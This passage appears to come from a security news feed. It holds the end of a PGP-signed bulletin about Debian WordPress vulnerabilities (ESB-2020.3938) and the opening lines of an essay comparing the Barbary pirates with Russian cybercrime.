nWStuwgAoDBZA5FLY+lIr5ioN46PD2SzjnNwBsyyBHHdu81Lbrid976RVFUfUsex
AtTQGIbDG3lr3DSL0lzwQKikgRnTHDO42PwP+dATpK3yH0sjr8xSSr3rqVITz+iB
qQVWc2UqHR+zUUbxoa6/W2V9y+zqVmm1BDvkIlbHw4x2m8/ErhrEo8FR9C3105I0
DdzQXxSFEEK6l/090I7gGtXIFHa9izk8AQ8pgytBTUAveWE/sLWdF1vHDfQhb3FY
HSPs/uzVvbLBDDfwr8xRWVjkL8kyism5ynmRwqtE+AiMqDWSVGlADdcZtcsyUeDt
WpOwXIdWwNIPrpalNbLeO/Bu2apvWw==
=Jo4W
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------



The post ESB-2020.3938 – [Debian] wordpress: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/esb-2020-3938-debian-wordpress-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3938-debian-wordpress-multiple-vulnerabilities

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...